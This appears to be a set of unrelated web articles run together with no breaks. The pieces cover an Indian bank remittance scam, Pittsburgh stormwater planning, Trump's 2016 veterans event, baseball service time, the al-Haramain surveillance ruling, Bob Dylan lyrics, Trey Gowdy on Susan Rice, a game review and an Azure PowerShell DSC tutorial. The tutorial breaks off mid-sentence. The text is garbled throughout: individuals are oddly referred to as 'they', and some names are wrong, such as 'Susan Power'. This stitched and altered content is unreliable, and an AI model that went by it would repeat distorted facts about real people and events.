Star Exim was incorporated with a paid-up capital of $ HK 10,000 and is located in an upmarket location in Hong Kong . But more interesting is the company 's owner 's address . The company belongs to one Om Prakash Rungta , living in the mining town of Chaibasa in West Singhbhum district of Jharkhand . The same address in Chaibasa is also registered in the name of Fulchand Sanwarmall , a small coal trading company .
Star Exim 's office in Hong Kong is occupied by Ashok Rungta of Krsna Group Ltd , a one-stop financial advisory company .
The money , which ran into several thousands of dollars , was meant for the import of rice and cashew to India . These were in reality never imported nor any invoices generated that could authenticate the trade .
Though the existence of the ‘ Advance remittance for imports ' route of transferring has been discovered , the arrests made by the investigating agencies has been in the Duty Drawback scam .
ALSO READ : Tracking the BoB money trail , from Vikaspuri to Hong Kong
CBI arrested BoB 's Ashok Vihar branch head SK Garg and the foreign exchange ( forex ) head of the bank branch , Jainis Dubey , for criminal conspiracy and cheating . ED arrested Kamal Kalra , working with the foreign exchange division of HDFC Bank and three other individuals — Chandan Bhatia , Gurucharan Singh Dhawan and Sanjay Aggarwal ( none of them working with any bank ) .
ED says that the HDFC Bank employee Kalra was allegedly helping Bhatia and Aggarwal in remitting the amount through BoB against a commission of 30-50 paise per dollar remitted abroad .
Bhatia 's role was in forming companies in India and remiting money to companies based in Hong Kong . Dhawan , an exporter of readymade garments , helped Bhatia . Dhawan allegedly obtained duty drawback to the tune of Rs 15 crore in a short period of 6-7 months Aggarwal was allegedly successful in sending tainted foreign remittances worth Rs 430 crore through BoB 's branch in Ashok Vihar in a short span of time .
Reports say that more arrests of similar middlemen and other operatives , including BoB employees , could take place in the near future . All the accused are alleged middlemen for at least 15 fake companies , out of the total 59 which were involved . ED is now investigating further to check the activities of the remaining suspected 44 fake firms which pumped in money to overseas locations in a similar manner .
The question is if those arrested are middlemen then who is the kingpin of this racket . Like all financial scams , there is a money trail which will ultimately lead to the beneficiary .
3 ) Money involved
ED said BoB informed them that the total amount deposited in the 59 accounts is Rs 5,151 crore and only 6.66 percent ( Rs 343 crore ) of this amount has been deposited in cash in the bank while remaining amount of Rs 4,808 crore came through other banking channels . Nearly 90 percent of the amount came from the Real-time gross settlement systems ( RTGS ) from 30 other banks comprising of public sector banks , foreign banks , private banks and co-operative banks , indicating involvement of more banks in the scam .
Between May 2014 and August 2015 , 5853 outward foreign remittances amounting to Rs 3,500 crore , mainly for the purpose of 'advance remittances for import ' was recorded . Funds were transferred through 38 current accounts to various overseas parties numbering to 400 , mainly based in Hong Kong and one in the UAE .
BoB said the total value of illegal remittances through its Ashok Vihar Branch in New Delhi was $ 546.10 million ( Rs 3,500 crore ) , much lower than Rs 5,151 crore estimated by ED and Rs 6,000 crore by the CBI .
Most of the forex transactions were carried out in newly-opened current accounts wherein heavy cash receipts were observed , but the branch did not raise the red flag and many rules were not followed .
4 ) Rules that were not followed
The entire scam came to light because BoB officials pointed out the suspicious transactions to the investigating agencies . But there were lapses at BoB 's end too . Banks are expected to raise exceptional transaction reports ( ETRs ) and suspicious transaction reports ( STRs ) with the RBI in case of discrepancies . The delay in pointing out these discrepancies resulted in the scam gaining momentum .
5 ) Unanswered questions
The Duty Drawback scam seems to be the smaller of the two , but it 's the advance remittance scheme which can snowball going forward .
Since the operations started in August 2014 , its planning would have taken a few months earlier , which coincides with the coming to power of the new government . The ‘ Advance remittances to import ' scheme has been put to use to transfer black money out of India on fears of it being detected .
One needs to know , whose money is it and how such huge amount of money was generated without being noticed . There is more to the story of Om Prakash Rungta from the mining town of Chibasa in Jharkhand , a ‘ small ' coal trader who owns a company in Hong Kong in which millions of dollars were transferred .
Your opinion is wanted on the City-Wide Green First Plan
Your opinion is wanted on the City-Wide Green First Plan
One of the biggest problems facing Pittsburgh today is stormwater management . Our old and faulty stormwater system overflows easily and often , releasing sewage that contaminates our rivers . Now local government has released a draft of the City-Wide Green First Plan , a look at how green infrastructure could provide a comprehensive , cost-effective solution to the very problem .
And they want your feedback on it .
Under the direction of Mayor William Peduto , the Pittsburgh Water and Sewer Authority ( PWSA ) drafted the plan to address stormwater management in a way that would benefit residents , and make the region compliant with state and federal environmental regulations .
“ We 're approaching this problem to improve the quality of our rivers , but also to improve the quality of our neighborhoods and the places where people live , ” says PWSA sustainability manager James Stitt .
The plan would deal with stormwater by combining green infrastructure —based on vegetation , soils , and other elements to restore some of the natural processes required to manage water and create healthier urban environments — with Pittsburgh 's existing sewer system .
In an official statement , Peduto said the approach could reduce local flooding , decrease basement backups , and help communities endure extreme weather events , as well as enhance economic development in the city .
Green First analyzed 13,700 acres in the city and proposes to manage runoff from 1,835 acres with green infrastructure . It also detailed six sewer sheds meant to manage overflows in areas where they occur the most , including Woods Run near Riverview Park , Heth 's Run in Highland Park , and Junction Hollow in Schenley Park .
The main goal of Green First focuses on keeping stormwater out of an ancient underground sewer system that delivers sewage and rainwater through the same pipes . During dry weather , flows are treated and released into the Ohio River by the Allegheny County Sanitation Authority ( ALCOSAN ) . However , when heavy rains occur the system becomes overwhelmed , which leads to overflows of sewage and water into local rivers .
“ It was initially designed when the city was a very different place , when it was okay to have a combined sewer system that might occasionally overflow into the rivers , ” says Stitt , adding that many parts of the system date back to more than 100 years . “ Now we get overflows with as little as a quarter-inch of rain or less in some places . ”
The volume and frequency of the overflows regularly contaminate rivers , violating water quality regulations set by the Pennsylvania Department of Environmental Protection and the EPA .
Adopting above-ground green infrastructure such as rain gardens , tree plantings , and water detention basins can prevent overflows by slowing the accumulation of stormwater in the current sewer system .
Stitt says the plan will also provide opportunities to connect neighborhoods and parks to the riverfronts with additions like walking trails and pedestrian bike paths .
“ Once these rivers are clean , and we can get in them every single day of the year without having to worry about overflow issues , we want people to have access to them as well , ” says Stitt .
Once approved , the plan would roll out over the next 20 to 30 years .
Want to add your take on the City-Wide Green First Plan ? The City is now accepting public feedback .
Republican presidential frontrunner Donald Trump has released the first details about the veterans-benefit event he 's producing instead of attending the presidential debate arranged by Fox News and Google .
The 8.00 p.m. Thursday event will take place at Drake University in Des Moines , Iowa . The event will raise funds for veterans ' organizations .
Trump announced Tuesday evening that they would not participate in Thursday 's Fox News debate .
According to Washington Post reporter Robert Costa , Trump 's campaign says they have reached out to “ all major networks ” to carry the event live .
Lewandowski tonight says the campaign has invited “ all major networks ” to carry Trump 's Thursday event live — Robert Costa ( @ costareports ) January 27 , 2016
UPDATE : In a CNN interview with Erin Burnett , Trump 's campaign manager Corey Lewandowski gave out more details on the forthcoming event at Drake University .
“ As you know we just put out a statement that says Mr. Trump is going to be at Drake University tomorrow night at 9 p.m. eastern and we 're going to raise money for the veterans of our great country who are treated like third-rate citizens , ” Lewandowski told Burnett . “ We 've got a full program . We 've got hundreds of media credentialed people who are going to be there to hopefully cover Mr. Trump 's event . We 'll take care of our veterans because our country is n't doing that . The VA is a disaster and it 's time to put those people first so that is what we 'll be doing tomorrow night at 9 p.m. eastern as opposed to participating in the Fox News debate . ”
Lewandowski added that they hope most media outlets carry Trump 's veterans event live .
“ It 's open the media and obviously as all of Mr. Trump 's speeches are if the networks choose to come and cover that we obviously would welcome that opportunity , ” Lewandowski said . “ It 's open . If they want to live feed or live stream that , they 're welcome to do that as they do many of their speeches . And I hope they will do that because I think the American people are going to look at that Fox News debate with that series of career politicians on that stage and say ‘ you know what ? This is not what we want . We want a leader . We want someone who is going to fix this . ' So why bother watching a debate which is all politicians who are all talk no action . ‘ We 'd rather watch a real leader in Donald Trump and what he 's going to talk about . ”
The game is thriving financially and players are reaping the benefits . With salaries escalating , major-league teams are giving second thought to potential superstar call-ups and when they want to start the service-time clock .
In an average year there are 183 service days in a major-league season , 162 games and 21 off days . If you accrue 172 days in any season , it is considered a full year . Six full years gets you to free agency . Five years and 170 days — like Rick Porcello currently has — does not .
Porcello is an interesting case as the Tigers did not intentionally alter their service time to delay their free agency for a year ; they just got a little lucky . They actually made the Tigers ' Opening Day roster in 2009 and spent the full season in the majors that year . But they were optioned to the minor leagues ( deservingly so ) in June of 2010 and spent 26 days in Triple-A Toledo . This move paused their service-time clock enough to delay their free agency . Otherwise they would have been a free agent this past winter .
Article continues below ...
I bring this up because the conversation of Cubs potential superstar Kris Bryant is an interesting one . Bryant is the No . 5 overall prospect in MLB according to Baseball Prospectus . They slugged 43 home runs between Double- and Triple-A last year , their OPS was 1.095 , and they have already hit two home runs this spring . The Cubs have a need at third base , and it seems like a perfect match .
But do we see them in the lineup at Wrigley on April 5th ? Maybe not .
The Cubs might contend this year , but it 's more likely they will just fall short . With their slew of hitting prospects and already respectable pitching staff , it is reasonable to expect the club to contend for years to come . Ideally , Kris Bryant is an integral part of that anticipated run .
If the Cubs wait 12 days into the 2015 season to call up Bryant , they would finish 2015 with less than one year of service time , 171 days total . Bryant is not currently on the Cubs ' 40-man roster . So technically , if they start the year in the minors , they are not “ optioned ” there , they are just “ assigned ” to minor-league camp .
In Major League Baseball , if a player is optioned to the minor leagues and recalled in less than 20 days , they do not use an option . They also accrue all of that service time retroactively . If Bryant were on the 40-man roster , the Cubs would actually have to wait 21 days into the season to call them up without the possibility that they accrue a full year of service time in 2015 .
So , can the Cubs afford to wait until April 17th , or 10 games into the season for the arrival of Kris Bryant ?
Probably .
The Atlanta Braves did n't wait on Jason Heyward in 2010 . They made the Opening Day roster and hit a memorable home run in their first at-bat . Heyward has exactly five years of service time and was traded away to the St. Louis Cardinals this off-season with free agency looming after 2015 . With a decent year , they could be looking at a Jacoby Ellsbury type seven-year , $ 153 million contract . I wrote about that here .
But what if the Braves waited 12 days and 10 games to call up Heyward ? They won the wild card that year by one game , holding off the San Diego Padres . They went on to lose in the NLDS to the eventual World Series Champion San Francisco Giants three games to one . Would they have made the postseason that year without Heyward for those first 10 games ? They hit .316 in that span and posted a 1.041 OPS . They also hit three home runs and drove in 12 runs . Did they help the Braves win at least one game , maybe two , in that time that otherwise might have been losses with a lesser right fielder ?
Probably .
If the Braves held back Heyward , they would be two full seasons from free agency right now and probably still with the team in 2015 . Worst case scenario , the Braves would have received an even better return for trading two years of player control rather than just one .
So , would Brave fans have preferred that Heyward be held back 11 or 12 days in 2010 , knowing that they would still be with team today or at least fetched even more in a trade this winter ?
That 's what Cubs fan , and more importantly their front office , have to ask themselves . Kris Bryant April 5th or wait 11 or 12 days and have them under control for seven years ?
I hate the manipulation of service time when it works against players . I believe if you 've earned a spot on a major-league roster , it should be yours . But I also understand this business and the smart play is controlling Kris Bryant for seven years , not six . The Cubs are smart and my money is on Bryant making their major-league debut April 17th at Wrigley Field versus the Padres .
But maybe the more important question is whether construction on the new bleachers will be complete so someone can catch their first home run .
The Buccaneers have announced a series of transactions today , making multiple changes to both their 53-man roster and their practice squad , per Scott Smith of Buccaneers.com . In a series of Twitter links , Smith reports the following moves :
Added to 53-man roster :
Cameron Brate , TE ( from practice squad )
, TE ( from practice squad ) D.J . Williams , TE
Waived :
Placed on injured reserve :
Jorvorskie Lane , FB
Added to practice squad :
Denicos Allen , LB
, LB Evan Rodriguez , FB
, FB Taylor Sloat , TE
Released from practice squad :
It 's no surprise that Thigpen and Lane were removed from the 53-man roster , considering Thigpen has muffed multiple punts in recent weeks , and Lane is out for the season with a leg injury . It 's interesting though that the team added a pair of tight ends to the roster to replace the departed players — that suggests that the club may rely on an in-house option to return kicks , and that perhaps one of the tight ends will play fullback , if necessary .
As Josh Gerstein just reported , the 9th Circuit has thrown out a decision against the government in the al-Haramain wiretapping suit . While they do n't comment on Judge Vaughn Walker 's judgement that al-Haramain had standing and had proven they had been spied on , the panel ultimately held that for the alleged actions–collecting al-Haramain 's telecommunications–the government has sovereign immunity . Al-Haramain can only sue individuals , not the government .
The ruling sucks for al-Haramain . But it has larger implications . Effectively , the 9th Circuit is saying there 's no way to hold the government accountable for simply collecting your telecommunications illegally ; you can only hold them accountable if they use that information in a trial .
It distinguishes those two activities this way , pointing to language that specifically invokes the United States as a defendant in case of 1806 ( use in an official proceeding ) but not 1810 ( collection ) .
Contrasting § 1810 liability , for which sovereign immunity is not explicitly waived , with § 1806 liability , for which it is , also illuminates congressional purpose . Liability under the two sections , while similar in its reach , is not identical . Section 1806 , combined with 18 U.S.C . § 2712 , renders the United States liable only for the “ use [ ] and disclos [ ure ] ” of information “ by Federal officers and employees ” in an unlawful manner . Section 1810 , by contrast , also creates liability for the actual collection of the information in the first place , targeting “ electronic surveillance or . . . disclos [ ure ] or use [ ] ” of that information . ( emphasis added ) . Under this scheme , Al-Haramain can bring a suit for damages against the United States for use of the collected information , but can not bring suit against the government for collection of the information itself . Cf . ACLU v. NSA , 493 F.3d 644 , 671 ( 6th Cir . 2007 ) ( Lead Opinion of Batchelder , J . ) ( noting that FISA potentially allows limitless information collection upon issuance of warrant , but limits use and dissemination of information under , inter alia , § 1806 ( a ) ) . Although such a structure may seem anomalous and even unfair , the policy judgment is one for Congress , not the courts . Also , because governmental liability remains under § 1806 , the district court 's concern that FISA relief would become a dead letter is not valid . See In re Nat ' l Sec . Agency Telecomms . Records Litig. , 564 F. Supp . 2d at 1125 . [ snip ] Congress can and did waive sovereign immunity with respect to violations for which it wished to render the United States liable . It deliberately did not waive immunity with respect to § 1810 , and the district court erred by imputing an implied waiver . Al Haramain 's suit for damages against the United States may not proceed under § 1810 .
Because al-Haramain , at a time when Vaughn Walker was using 1810 to get by the government 's State Secrets invocation , said “ it was not proceeding under other sections of FISA , ” its existing claim is limited to 1810 . The government used the information collected–in a secret process that ended up declaring al-Haramain a terrorist supporter–but not in a trial , and therefore not in a way al-Haramain can easily hold the government liable for .
The implication , of course , is that all the rest of the collection the government engages in–of all of us , not just al-Haramain–also escapes all accountability . So long as the government never uses the information itself–even if the entire rest of their case is based on illegally collected information ( as it was in , at a minimum , al-Haramain 's terrorist designation ) –a person can not hold the government itself responsible .
The people who can be held accountable ? The non-governmental or non law enforcement persons who conduct the surveillance .
But of course , they–the telecoms–have already been granted immunity .
Hilarious video shows weather report interrupted as CAT sneaks across screen
A live Univision weather report was hilariously interrupted to induced laughter from the control room when a curious feline snuck onto the set and across the green screen .
Unexpectedly creeping just the tip of its tail across the map of Southern Florida , the cat enters through the Gulf of Mexico flicking like a sea snake past the feet of the otherwise occupied forecaster .
Carrying on like a true champ , Chief Meteorologist Eduardo Rodriquez kept their cool as if never noticing the cat who eventually took a seat in the Bahamas .
Scroll down for video
This just in : Gradually creeping its flicking tail into the picture , seen first bottom left of the man 's feet , a stray cat who sneaked into the Miami studio infiltrated a weatherman 's report but not their focus on their job
Distraction free : Chief meteorologist Eduardo Rodriquez kept their complete focus on their weather map carrying on without any obvious reaction to the curious feline making a beeline for the Bahamas
But the video may have revealed a much larger underlying story beyond Southern Florida 's apparent unusually cold temperatures : The studio 's got a cat problem .
'There are several cats that have turned the Univision parking lot into their home and sometimes they make it into the studio , ' the staff at WLTV admitted with the video 's posting to YouTube on Monday .
'This cat just walked right through the weatherman 's report , ' they wrote .
After it took off to explore perhaps new sets and scenes , or to the desperate calling of staff , Mr Rodriquez finished their report cat free .
Tail time : The cat eventually parks itself on the islands for the majority of their report before coolly walking away having secured its 'tail time '
Quick Access
Review / Favorite Track / For Fans Of / Atmosphere Levels / Links ( Music & Social )
Time for some 70 's Rock & Roll !
How is the sound ?
Vidunder is a Swedish band from Malmö , putting out their 2nd album this year after their self-titled in 2013 . Their sound is a 70 's stoner rock , much like Graveyard or Witchcraft , but with the very nice addition of an organ . This alone makes quite a big difference to me , to get the early 70 's vibe going .
Martin 's singing is much more in a “ raw rock ” style than in other bands , which can be a bit disconcerting at first , but is great once you 're used to it . The whole album is very catchy , do n't expect a lot of psychedelic breaks , but this makes a great album to have some fun or to introduce new people to 70 's stoner ( some tracks like Phoenix Cluster are even radio-friendly without betraying the genre ) .
Why is this album worth listening ?
Have some fun with some real good 70 's revival rock
There are some real earworms in there 🙂
Organ rules , that 's a fact
Something particular to note ?
I saw them live very recently , and what a show that was ! They did their tracks of course , and ended with a Roky Erikson cover and then a very nice instrumental jam . Lots of people there did n't know them , and Vidunder won them over with an incredible performance .
Mika Brzezinski and Joe Scarborough ( MSNBC )
MSNBC 's Joe Scarborough and Mika Brzezinski are increasingly worried about President Donald Trump 's mental state after a recent series of “ bizarre ” interviews .
Scarborough , who 's known Trump for years , warned Monday that the president 's “ rambling and incoherent ” speech patterns were “ getting worse , ” and they and Brzezinski returned from a week off the air to discuss their growing concerns .
“ We 're going to say what maybe no one — we 'll do it again , ” Brzezinski said . “ I 'm not sure he 's okay . I 'm not sure he 's okay . You have that feeling with people who are not okay , where it starts to dawn on you that they are not okay . There 's a much bigger issue . ”
The “ Morning Joe ” co-hosts stopped short of diagnosing the president , but they wondered if the stress of the job had triggered psychological problems or whether they were displaying confusion associated with a lack of sleep .
“ It 's getting worse , worse than it has been , ” Scarborough said . “ You talk about the ( Associated Press ) interview and these other interviews . The president of the United States saying , ‘ Gee , this is a lot harder than my last job was . ' There 's not a human being on the face of the earth that would n't understand that you were stepping into the most difficult job of your life . Just look at pictures of presidents walking in and walking out of the White House . ”
Watch in the video below :
‘ I 'm not sure he 's OK ' : MSNBC 's Joe and Mika… by sarahburris
The moral dilemma of a young Australian caught smuggling the good shit .
For those of you in the know , Indonesia has a zero tolerance for drug use and further a more deadly tolerance of those caught in the dealing of narcotics . Enter young Scott Rush who has embroiled Australian authorities who are trying to get Scott 's 2006 death sentence remuted back to life . Do they have a chance ?
Sydney Morning Herald : Indonesian prosecutors have asked that drug mule Scott Rush be killed by a firing squad , arguing that the Indonesian community would want the harshest possible punishment for their role as a courier in the Bali Nine heroin smuggling syndicate .
In a 14-page submission to a court in Denpasar , Bali , the prosecutors argued that the notion that Rush was merely a courier was not a consideration in the Indonesian legal system .
Granted Scott Rush is guilty , but the question remains , should Rush 's life be spared because this was a first offense and that no matter the severity of the punishment one can argue if statistics are a guide that drug smuggling will always be a way of life in South East Asia and if the Indonesian government hopes to quail such activities the severity of life imprisonment should be enough of a deterrant to anyone contemplating such an act .
In an unprecedented act , former Australian Federal Police chief Mick Keelty and current Deputy Commissioner Michael Phelan travelled to Bali to testify for Rush this month , telling the court they were a low level courier on their first overseas trip who did not deserve death .
But the prosecutors argued this testimony did not constitute “ new evidence ” , as argued by Rush 's lawyers and required by law in Indonesia to launch a judicial review .
They added that Rush had harmed Bali 's reputation as a tourist destination and endangered the local economy .
What would perversely be endangered as well is the negative pall that this would cause between Australian authorities who have held a tenuous relationship with the Indonesian government over the years ( one could even wonder if this is payback for some of Australia 's own harsh policies concerning boat people who have traveled to Australia looking for clemency ) and not say other tourists who might fear themselves innocently or not being caught in future events .
In a shock decision in 2006 , the Indonesian Supreme Court upgraded the sentences of four members of the Bali Nine drug ring from life to death .
Three of those four – Matthew Norman , Si Yi Chen and Tan Duc Thanh Nguyen – had their sentences revert back to life after a judicial review .
No matter the law of the land the question remains , should Indonesia consider the ramifications of an admittedly harsh penalty or should we just accept the day one becomes a drug mule they are literally playing with their life .
Above : Mark Wahlberg
By the Caribbean Journal staff
Actor Mark Wahlberg has taken an equity interest in the Barbados Tridents of the new Caribbean Premier League .
The Tridents are part of the upstart cricket league , which pits six Caribbean sides against each other in a regional tournament .
“ I 'm excited to be a part of the Limacol Caribbean Premier League because I know cricket is huge in the Caribbean and a rich part of the region 's heritage , ” Wahlberg said in a statement . “ Sports and entertainment are a powerful combination , and the LCPL will appeal to a huge audience worldwide . ”
The actor said they were first introduced to Barbados and the new Limacol Caribbean Premier League through their friend , Ajmal Khan .
“ I am a huge cricket fan now , ” they said .
Khan is the chairperson of Verus International and founder of the LPCL .
“ Having Mark involved with the Limacol CPL is quite a coup for us . They bring a global celebrity appeal , which adds to the party atmosphere , and anticipation that is already building in these final days before the tournament begins , ” Khan said . “ Having them as an ambassador of the greatest party in sport will indeed draw the attention of current and new cricket fans across the world , and we look forward to embracing a whole new generation of cricket fans in the US thanks to Mark . ”
Limacol CPL CEO Damien O'Donohoe said the league was “ thrilled ” that Wahlberg had taken an equity interest in the team .
“ He is keen to promote the tournament in any way possible , and their fame and influence will definitely raise the profile of the tournament , and bring awareness of the game to an audience that traditionally has no connection with cricket , ” they said . “ We 're excited to see the many ways in which this partnership will benefit both Mark and the LCPL . ”
The LCPL held its first match on Tuesday , when St Lucia 's Zouks faced off against Barbados .
The tournament concludes on Aug. 24 in Trinidad .
A team of physicists from the Autonomous University of Madrid ( UAM ) and the Madrid Institute of Advanced Studies in Nanoscience ( IMDEA-Nanociencia ) has created the “ quantum stabilized atom mirror , ” the smoothest surface ever , according to a recent article in Advanced Materials .
The innovation is already being used in the design of the world 's first atomic microscope .
One of the study 's authors , Rodolfo Miranda , professor of condensed matter physics at the UAM and director of the IMDEA-Nanociencia , said that the innovation with this almost perfect mirror is the ability to reflect “ extraordinarily well ” most of the atoms that affect it , through the use of materials of nanometric thickness whose properties are dominated by quantum effects .
The mirror resembles a curved wafer . It is made up of a thin silicon crystal with a thickness of 50 microns , and covered with a very fine layer of lead , 1 or 2 nanometres thick . To study the reflection on this metal , the scientists used helium atoms . Until now mirrors made solely from silicon reflected 1 % of helium atoms , but by adding the layer of lead they have managed to achieve a reflection of up to 67 % .
The lead is deposited on the silicon at a temperature of between -173º and -133º C which , together with the nanometric thickness of the lead , allows its quantum properties to “ come to the surface ” , and , in an “ astonishing and spontaneous ” way , bumps on the surface become evened out and a super flat layer is created . “ The extraordinary thing about this process is that when the material is heated to room temperature , it does not distort or break , but instead becomes even flatter , enhancing its reflection properties ” , Miranda indicated .
These types of mirrors are vital for manufacturing future atomic microscopes . Until now electronic microscopes have achieved the highest resolutions when it comes to viewing objects , but with the disadvantage that the accelerated electrons they use destroy the most delicate biological samples , such as cell membranes or certain protein structures . “ With atomic microscopes we hope to achieve the same resolution but without damaging samples ” , said the professor of physics .
Miranda pointed out that atoms have a much greater mass than electrons , “ which is why we can achieve the same wavelength with far lower energy , allowing us to observe things as small as those observed with an electronic microscope , but without destroying what we are viewing . ”
The Spanish researchers , together with the team led by Bill Allison at the University of Cambridge ( United Kingdom ) and Bodil Holst at the University of Graz ( Austria ) , are now working with the first prototypes of atomic microscopes that use quantum stabilized mirrors , and are confident that the first images obtained with them will be ready next year .
Bob Dylan – One Too Many Mornings 1976 – ( Rolling Thunder Revue )
Down the street the dogs are barkin '
And the day is a-gettin ' dark
As the night comes in a-fallin '
The dogs 'll lose their bark
An ' the silent night will shatter
From the sounds inside my mind
For I 'm one too many mornings
And a thousand miles behind
From the crossroads of my doorstep
My eyes they start to fade
As I turn my head back to the room
Where my love and I have laid
An ' I gaze back to the street
The sidewalk and the sign
And I 'm one too many mornings
An ' a thousand miles behind
It 's a restless hungry feeling
That do n't mean no one no good
When ev'rything I 'm a-sayin '
You can say it just as good .
You 're right from your side
I 'm right from mine
We 're both just one too many mornings
An ' a thousand miles behind
https : //www.dailymotion.com/video/x4k2ep4_bob-dylan-one-too-many-mornings-live-1976-rolling-thunder-tour_music
South Carolina Rep. Trey Gowdy has had their differences with former National Security Advisor Susan Rice in the past , most notably after Rice gave false statements about the Sept. 11 , 2012 attacks in Benghazi .
But Gowdy is offering up some praise of Rice following their interview with the House Permanent Select Committee on Intelligence ( HPSCI ) last week .
“ I thought they gave a very good accounting of herself , frankly , and I 'd be the first to say otherwise , ” Gowdy told The Daily Caller in an interview on Friday .
Rice met with the committee on Tuesday to discuss a wide range of issues related to Russian meddling in the presidential campaign .
HPSCI , of which Gowdy is a new member , is one of three congressional panels investigating Russia 's activities during the campaign . But , HPSCI is the only committee taking a close look at whether members of the Obama administration improperly revealed the identities of Trump advisers mentioned in intelligence reports compiled by U.S. intelligence officials . ( RELATED : EXCLUSIVE : Gowdy Wonders If Democrats Are ‘ Fearful ' That Trump Dossier ‘ Is A Piece Of Fiction ' )
Names of individuals identified in those documents are usually redacted , though a handful of government officials have the authority to reveal them through a process known as “ unmasking . ”
Rice has become a central figure in HPSCI 's investigation into who improperly unmasked Trump advisers and leaked their names to the media . Rice , a former ambassador to the United Nations , was identified earlier this year as one Obama administration official who requested unmaskings . The unanswered question has been whether Rice made the requests for political purposes — to undercut Trump — or for legitimate national security reasons .
Gowdy spoke carefully about Rice 's interview , but they did tell TheDC that they spoke with a “ lot of specificity ” about their activities as national security adviser .
“ She stayed longer than they were originally scheduled to say , and I say that as a credit to her , for being willing and taking the matter seriously , and they did , ” Gowdy said .
“ She answered every question we had and stayed longer than they were originally scheduled to say , and I ca n't say that about all witnesses , ” they added .
Gowdy said that Rice was “ an important witness ” in the committee 's investigation , not only because they are aware of U.S. intelligence regarding Russian meddling in the presidential campaign , but they were also involved in crafting the Obama administration 's response to the Kremlin 's activities .
As more evidence has emerged about Russia 's activities last year , the Obama administration has faced heavier criticism for failing to respond more forcefully to Russian cyberattacks on the Hillary Clinton campaign and Democratic National Committee .
Gowdy also said that it was important to speak with Rice because “ she 's familiar with the process ” of unmasking individuals identified in intelligence reports .
As national security advisor , Rice was one of the U.S. officials authorized to unmask the identities of people mentioned in intelligence reports .
Asked whether Rice improperly unmasked Trump advisers or disclosed classified information to the media , Gowdy said that “ there was nothing that came up in their interview that led me to conclude ” that was the case .
“ With a lot of specificity , ” Rice “ denied ever being a felonious dissemination of classified material . They could not have been more clear about that , ” Gowdy said .
Gowdy also said that there is documentation about who requested unmaskings and why they did so .
While Rice has receded as a candidate for the improper unmaskings , attention has recently turned to former UN Amb . Susan Power .
Last month , California Rep. Devin Nunes , the chairperson of HPSCI , identified an Obama administration official , later identified as Power , as having made hundreds of unmasking requests in the final year of the Obama administration . Nunes asserted that those unmasking requests were followed by unauthorized leaks to the media .
HPSCI has sought an interview with Power and other former Obama administration officials to discuss unmasking .
Follow Chuck on Twitter
On your first playthrough it 'll probably take about 9-12 hours before the game starts getting good , and about twenty hours before you feel somewhat engaged . Prior to that , it 's actually somewhat mundane — schlock & grind gameplay with unnecessarily confusing game world politics… Yeah , I know ; you basically have to play an averaged sized game in order to get to a point where Dragon Age : Inquisition finally hits its stride , but if you 're a fan of the genre or franchise , it should be worth it . Not only that , but in the grand scheme of things , even twelve hours is a drop in the bucket for Inquisition . At around that time ( apparently it 's about 1/3rd of the way through the storyline ) your main objective is reinforced , for better or worse the peripheral “ set-up ” choices have been culled , and your party/gear has reached a decent level of well roundedness . Most importantly , at ~10+ hours in , you 'll surely have a decent enough grasp on the universe to know who 's who and what 's what , allowing you to really start molding the world the way you want .
Click to expand ...
DSC , Pester , Powershell Posted in Azure
After the first post of this series , we have now four virtual machines . The goal , now , is to apply Configurations .
In order to apply configurations , you must use at least Azure SDK 0.8.6 . In order to validate if your version is compatible , you can try this command :
Get-AzureVMAvailableExtension -publisher Microsoft.PowerShell 1 2 3 Get-AzureVMAvailableExtension -publisher Microsoft . PowerShell
This will permit to check if DSC extension is available . You must have a return like this one
Publisher : Microsoft.Powershell ExtensionName : DSC Version : 1.5 Label : DSC Description : PowerShell DSC ( Desired State Configuration ) Extension PublicConfigurationSchema : PrivateConfigurationSchema : IsInternalExtension : False SampleConfig : ICB7DQogICAgInB1YmxpY1NldHRpbmdzIjogew0KICAgICAgICAiTW9kdWxlc1VybCI6ICJodHRwczovLzx1cmwgdG8gY29uZmln ... ReplicationCompleted : True Eula : http : //azure.microsoft.com/en-us/support/legal/ PrivacyUri : http : //www.microsoft.com/ HomepageUri : http : //blogs.msdn.com/b/powershell/ IsJsonExtension : True DisallowMajorVersionUpgrade : False SupportedOS : PublishedDate : 11/19/2014 7:32:56 PM CompanyName : Microsoft Corporation 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 Publisher : Microsoft . Powershell ExtensionName : DSC Version : 1 . 5 Labels : DSC Description : PowerShell DSC ( Desired State Configuration ) Extension PublicConfigurationSchema : PrivateConfigurationSchema : IsInternalExtension : False SampleConfig : ICB7DQogICAgInB1YmxpY1NldHRpbmdzIjogew0KICAgICAgICAiTW9kdWxlc1VybCI6ICJodHRwczovLzx1cmwgdG8gY29uZmln . . . ReplicationCompleted : True Eula : http : / / azure . microsoft . com / en -us / support / legal / PrivacyUri : http : / / www . microsoft . com / HomepageUri : http : / / blogs . msdn . com / b / powershell / IsJsonExtension : True DisallowMajorVersionUpgrade : False SupportedOS : PublishedDate : 11 / 19 / 2014 7 : 32 : 56 PM CompanyName : Microsoft Corporation
If you do n't have this result , please try to update your SDK catching the last one on github 😉
Create a storage container
A storage container is necessary if we want using a DSC resource to be fully automated when we deploy our virtual machine . In order to create a container we will use the Storage account created in the first post , create a storage key and build a storage context . Do not run , this is pretty easy , Look !
At first let 's look about what cmdlets we need
get-command -Module Azure | ? Name -li `` * StorageKey '' 1 2 3 get-command -Module Azure | ? Name -li `` * StorageKey ''
Let 's assume you already have created a storage account so , in order to get ou storage key , just use the Get-AzureStorageKey cmdlet .
Get-AzureStorageKey -StorageAccountName < sotrageaccountname > 1 2 3 Get-AzureStorageKey -StorageAccountName < sotrageaccountname >
As you see , you have a Primary and a secondary key , right now only the primary will be used to build our container .
As i said previously , a storage context is also needed in order to build our container . So , let 's use the marvelous cmdlet New-AzureStorageContext
$ Key = Get-AzureStoragekey -StorageAccountName < storageAccount > $ Context = New-AzureStorageContext -StorageAccountName ' < storageAccount > ' -StorageAccountKey $ Key.Primary 1 2 3 4 $ Key = Get-AzureStoragekey -StorageAccountName < storageAccount > $ Context = New-AzureStorageContext -StorageAccountName ' < storageAccount > ' -StorageAccountKey $ Key . Primary
Ok , all stuff is ready to create the container .
New-AzureStorageContainer -Name demopwrshelldotnet -Context $ Context 1 2 3 New-AzureStorageContainer -Name demopwrshelldotnet -Context $ Context
Publish DSC Configuration
Our container is now available , so let 's build our DSC configuration in order to push it to our VMs . To show you the power of DSC on Azure , I 'll take a custom resource created by myself . Like that I 'm sure this resource is not already available on .vhd listed for Windows Server 2012R2 !
First of all , let 's create the configuration , and only the configuration . There is no need to compile MOF and add Start-DSCConfiguration to the script
